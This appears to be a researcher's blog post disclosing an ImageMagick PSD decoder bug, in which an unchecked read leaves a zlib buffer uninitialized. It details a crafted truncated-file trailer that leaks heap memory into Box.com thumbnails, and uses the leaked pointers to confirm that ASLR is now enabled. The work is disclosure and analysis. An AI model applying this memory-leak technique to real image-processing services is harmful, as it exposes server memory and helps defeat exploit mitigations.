[0day] Proving Box.com fixed ASLR via ImageMagick uninitialized zlib stream buffer

Overview

In my previous post, we explored using an ImageMagick 0day (now a 1day) in the RLE decoder to determine missing ASLR in both box.com and dropbox.com. In response, both Box and Dropbox sensibly limited the available decoders. Both dropped RLE support and lots more.

As you may recall from a different but related post, I had challenges working with Box to accurately determine the status of security reports I submitted. In fact, I have neither a confirmation nor denial of the missing ASLR issue on ImageMagick. I've already proven the missing ASLR to my satisfaction in the previous posts -- but is it fixed?

This is a fairly ridiculous length to go to, but: let's prove that Box did fix the ASLR issue, by using another ImageMagick 0day!

Visualization

Here's a zoomed-in sample image from box.com, produced by thumbnailing a greyscale 8x16 variant of an image file that we'll explore below. We're seeing raw memory bytes from a free chunk:


The vulnerability

So when Box went on an ImageMagick decoder removal spree, they obviously had to leave intact the decoders for a few popular formats: JPEG, PNG, etc. One of the less common decoders left intact was PSD: Adobe Photoshop. This is an understandable product decision. But it's also more attack surface for us to examine. The 0day vulnerability is in the PSD decoder (coders/psd.c):

ReadPSDChannelZip()
[...]
  compact_pixels=(unsigned char *) AcquireQuantumMemory(compact_size,
    sizeof(*compact_pixels));
[...]
  ResetMagickMemory(&stream,0,sizeof(stream));
  stream.data_type=Z_BINARY;
  (void) ReadBlob(image,compact_size,compact_pixels);

  stream.next_in=(Bytef *)compact_pixels;
  stream.avail_in=(uInt) compact_size;
  stream.next_out=(Bytef *)pixels;
  stream.avail_out=(uInt) count;

  if (inflateInit(&stream) == Z_OK)
    {
      int
        ret;

      while (stream.avail_out > 0)
      {
        ret=inflate(&stream,Z_SYNC_FLUSH);
        if ((ret != Z_OK) && (ret != Z_STREAM_END))
          {
[...]

The above code snippet is reading in a PSD image color channel from the input file, where it is compressed using ZIP compression. The compact_size variable comes nearly directly from the input file, and it represents the size in bytes of the compressed zip stream. This size is used to allocate a malloc()'ed buffer to hold the compressed data, and the buffer is filled with a read from the input stream. The vulnerability is that there is no return value checking for the ReadBlob() call. This means that if the input file hits an end-of-file condition during the read, the compact_pixels buffer will remain partially or even fully uninitialized.
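
The effect of the unchecked read can be sketched outside ImageMagick. The following Python is an illustration only, not ImageMagick code: the function names and the 0xAA filler standing in for stale heap contents are assumptions made for the demo.

```python
import io

STALE = 0xAA  # assumed filler byte standing in for whatever the heap chunk held before


def read_blob_unchecked(stream, buf):
    """Mimic the pattern in the excerpt: fill buf and ignore the byte count."""
    stream.readinto(buf)  # return value discarded, like the (void) ReadBlob() call
    return buf


def read_blob_checked(stream, buf):
    """What a defensive caller would do: treat a short read as an error."""
    count = stream.readinto(buf)
    if count != len(buf):
        raise EOFError(f"short read: wanted {len(buf)} bytes, got {count}")
    return buf


# The file claims 16 bytes of compressed data but ends after 7.
truncated_file = bytes.fromhex("789c01ffff0000")
buf = bytearray([STALE] * 16)
read_blob_unchecked(io.BytesIO(truncated_file), buf)

print(buf[:7].hex())  # bytes that really came from the file
print(buf[7:].hex())  # bytes the read never touched
```

With the checked variant, the same truncated input raises EOFError instead of handing stale bytes to the decompressor.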

You can refer to this vulnerability as CESA-2017-0003. It really is an 0day: unreported or unfixed upstream, let alone in Linux distributions or on cloud providers.

The exploit

The previous ImageMagick bugs I've been exploiting have been relatively simple to exploit because raw bytes of memory end up directly in the decoded canvas. With this vulnerability, however, the raw bytes of memory are in a buffer which is to be decoded as a zlib stream. Obviously, many possible sequences of bytes will not be valid zlib streams. And sequences of bytes that are valid zlib streams will likely result in output that is hard (or impossible) to reverse back to the original raw memory bytes. Finally, note that zlib streams are checksummed, and quasi-random bytes in memory are unlikely to have a correct trailing checksum.

Fortunately, a little trick does present us a neat solution. It's useful to have a basic understanding of the zlib format, RFC1950 and the contained deflate stream format, RFC1951. The core of the trick is noting that the deflate stream format is composed of blocks, with the block types being:

BTYPE specifies how the data are compressed, as follows:

            00 - no compression
            01 - compressed with fixed Huffman codes
            10 - compressed with dynamic Huffman codes
            11 - reserved (error)

We really don't want to get into reversing the output of Huffman decoding, but "no compression" sounds very intriguing. What if we used a preamble of a zlib header followed by an uncompressed deflate block, leading in to the bytes of uninitialized memory? We can achieve this by abruptly ending our PSD input file with this 7 byte sequence:

78 9c: standard zlib header and options
01   : deflate block header: final-block bit set, block type 00 (no compression)
ff ff: length 65535
00 00: length "checksum", which is the bitwise complement of the length
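
As a sanity check on those 7 bytes, here is a small Python sketch that rebuilds the preamble from the field definitions in RFC 1950 and RFC 1951. The helper name stored_block_preamble is made up for this illustration.

```python
import struct


def stored_block_preamble(length=0xFFFF):
    """Zlib header plus the header of one stored (uncompressed) deflate block."""
    cmf, flg = 0x78, 0x9C
    # RFC 1950: CMF and FLG, read as a big-endian 16-bit value, must be a multiple of 31.
    assert (cmf * 256 + flg) % 31 == 0
    # RFC 1951: bit 0 is BFINAL, bits 1-2 are BTYPE. 0x01 means final block, BTYPE=00.
    block_header = 0x01
    # LEN and NLEN are little-endian 16-bit values; NLEN is the one's complement of LEN.
    return bytes([cmf, flg, block_header]) + struct.pack("<HH", length, length ^ 0xFFFF)


preamble = stored_block_preamble()
print(preamble.hex())  # 789c01ffff0000
```

Note that the third byte, 0x01, is not "block type 1": the low bit is the final-block flag and the two block type bits above it are both zero.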

Let's say we have an input file which claims a compressed length of 16. The 16 byte compressed data buffer is allocated, but filling it results in a short read of 7 bytes (which goes unnoticed and unchecked), leaving the remaining 9 bytes uninitialized:

compact_pixels: | 78 9c 01 ff ff 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? |

Treating this as the first 16 bytes of a zlib stream will decode to whatever is in those 9 bytes of uninitialized memory, shown as ?? above. We're back to exfiltrating raw bytes again, which is a win. (Note that the start of the output is at byte 7 into the heap chunk, which is not nicely 8-byte aligned. This explains why the pointers in the dump below appear to be offset by 1 byte.)

There's one more quirk, though. This still isn't a valid zlib stream because it is truncated, both in terms of missing data and a missing final checksum. How will the ImageMagick PSD decoder handle this? The answer lies in looking at the exit condition for the zlib inflate loop. We see that it only cares that the output buffer was filled. It specifically does not care if the zlib API never declares that the decode ended. So again taking the hypothetical 16 byte compressed data buffer, the PSD code will stuff 16 bytes as input into the zlib input buffer. Let's further assume that the output channel is a 2x2 canvas, requiring 4 bytes to fill. This buffer and length are also passed to zlib as the output buffer and length. When zlib is called for the first time, it will have 9 bytes of actual output available, but emit only 4 of them because that's the size of the output buffer. And that's it. The PSD code will exit the zlib decode loop and continue. (In case you are curious, a more typical zlib loop would consume the full zlib output buffer, then call into zlib again with a new output buffer to fill. It would also perhaps similarly check to see if the input buffer was fully drained.)
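
The same behavior can be reproduced with zlib from Python. This is a sketch of the idea rather than the PSD decoder itself: the 9 "stale" bytes are invented for the demo, and the max_length argument plays the role of stream.avail_out for the hypothetical 2x2 canvas.

```python
import zlib

preamble = bytes.fromhex("789c01ffff0000")         # zlib header + stored block header
stale_heap = bytes.fromhex("deadbeef0102030405")   # 9 invented "uninitialized" bytes
compact_pixels = preamble + stale_heap             # the 16 byte "compressed" buffer

# Ask for at most 4 output bytes, as a decoder filling a 2x2 greyscale channel would.
decoder = zlib.decompressobj()
pixels = decoder.decompress(compact_pixels, 4)

print(pixels.hex())   # the first 4 stale bytes, passed through untouched
print(decoder.eof)    # False: zlib never saw the end of the stream

# A caller that insists on a complete stream rejects the very same buffer.
try:
    zlib.decompress(compact_pixels)
    strict_result = "accepted"
except zlib.error:
    strict_result = "rejected"
print(strict_result)
```

The bounded call succeeds because filling the output buffer is a perfectly normal stopping point for zlib. Only a caller that waits for the end of the stream would notice the truncation and the missing checksum.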

Here's the sample PSD exploit file: zip_uninit_read_128.psd.

I won't break this one down byte by byte because it's 133 bytes of file format glue to get to the ZIP attack surface.

Results

Let's upload the PSD file to Box, view the preview pane for the uploaded file, and save the displayed PNG file. It results in an image like the one above. Extracting raw bytes is just a matter of an ImageMagick conversion command, although the Ubuntu 16.04 LTS ImageMagick appears to be buggy for certain greyscale images, so we'll use GraphicsMagick:

gm convert box_zip_uninit_128.png out.gray
od -t x1 out.gray

0000000 00 f8 81 bd 7b 18 7f 00 00 70 00 00 00 00 00 00
0000020 00 71 00 00 00 00 00 00 00 00 d1 d0 7d 18 7f 00 
0000040 00 78 81 bd 7b 18 7f 00 00 80 94 d0 7d 18 7f 00 
0000060 00 d0 ce d0 7d 18 7f 00 00 20 00 00 00 00 00 00
0000100 00 50 00 00 00 00 00 00 00 80 d1 d0 7d 18 7f 00 
0000120 00 31 00 00 00 00 00 00 00 78 81 bd 7b 18 7f 00 
0000140 00 80 cf d0 7d 18 7f 00 00 30 58 d1 7d 18 7f 00 
0000160 00 78 81 bd 7b 18 7f 00 00 90 00 00 00 00 00 00

In the above hex dump, the pointers are the 8-byte little-endian values ending in 18 7f 00 00, for example f8 81 bd 7b 18 7f 00 00, which is 0x00007f187bbd81f8. There are ten of them, and all ten are wholesome pointers indicating good ASLR. You can contrast this with some pointers in my previous post which clearly indicated that Box did not have ASLR on their binary.
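
For anyone who wants to check the pointer count mechanically, here is a rough Python sketch that parses the od output, skips the 1 byte of misalignment noted earlier, and reads the rest as little-endian 64-bit values. The two classification rules are my assumptions for illustration: values of the form 0x00007f.......... are treated as randomized mmap-region pointers, and anything from 0x400000 up to 4GB is treated as a possible non-ASLR binary address.

```python
import struct

OD_DUMP = """\
0000000 00 f8 81 bd 7b 18 7f 00 00 70 00 00 00 00 00 00
0000020 00 71 00 00 00 00 00 00 00 00 d1 d0 7d 18 7f 00
0000040 00 78 81 bd 7b 18 7f 00 00 80 94 d0 7d 18 7f 00
0000060 00 d0 ce d0 7d 18 7f 00 00 20 00 00 00 00 00 00
0000100 00 50 00 00 00 00 00 00 00 80 d1 d0 7d 18 7f 00
0000120 00 31 00 00 00 00 00 00 00 78 81 bd 7b 18 7f 00
0000140 00 80 cf d0 7d 18 7f 00 00 30 58 d1 7d 18 7f 00
0000160 00 78 81 bd 7b 18 7f 00 00 90 00 00 00 00 00 00
"""


def parse_od(text):
    """Turn `od -t x1` output back into bytes, dropping the offset column."""
    data = bytearray()
    for line in text.splitlines():
        fields = line.split()
        data += bytes.fromhex("".join(fields[1:]))
    return bytes(data)


raw = parse_od(OD_DUMP)
body = raw[1:]                        # realign: the leak starts 7 bytes into the chunk
usable = len(body) - len(body) % 8    # ignore the incomplete trailing value
qwords = struct.unpack(f"<{usable // 8}Q", body[:usable])

# Assumed heuristics, see the paragraph above.
pointers = [q for q in qwords if q >> 40 == 0x7F]
suspicious = [q for q in qwords if 0x400000 <= q < 0x100000000]

for p in pointers:
    print(hex(p))
print(len(pointers), "randomized-looking pointers,", len(suspicious), "suspicious")
```

The remaining values (0x70, 0x71, 0x20 and so on) are small integers, not addresses.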

Proving a result with a negative (the lack of a clearly dubious pointer) is not particularly scientific, but I'll note that I tried a variety of different upload image sizes in order to explore the content of recently freed heap chunks of a variety of different sizes. I also tried the upload of some files multiple different times and never saw a pointer indicating a lack of binary ASLR. When binary ASLR was indeed absent, the same tests readily indicated the fact.

Conclusion

The overall weight of evidence, split across two blog posts, suggests that Box did not previously have binary ASLR enabled, and they did indeed make a change and fix the issue after my report. We used an ImageMagick 0day (now 1day) to prove that ASLR was missing, and then a different ImageMagick 0day (still 0day today :) to prove that ASLR is now present. The loop is now satisfactorily closed.